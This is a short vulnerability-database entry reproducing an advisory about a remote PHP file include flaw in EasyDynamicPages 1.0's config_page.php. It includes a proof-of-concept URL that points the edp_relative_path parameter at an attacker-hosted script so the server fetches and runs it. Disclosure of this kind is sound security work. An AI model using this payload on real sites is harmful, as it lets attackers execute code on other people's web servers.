EasyDynamicPages 1.0 config_page.php Remote PHP File Include Vulnerability

2014-07-01T00:00:00
ID SSV:77268
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                source: http://www.securityfocus.com/bid/9338/info

EasyDynamicPages is prone to a remote file include vulnerability in a configuration script. This will permit a remote attack to include malicious PHP scripts from remote servers, which will then be executed by the web server hosting the vulnerable software. 

http://www.example.com/dynamicpages/fast/config_page.php?do=add_page&du=site&edp_relative_path=http://[attacker's_site]/

The attacker must have a malicious script hosted at the following location:

http://[attacker's_site]/admin/site_settings.php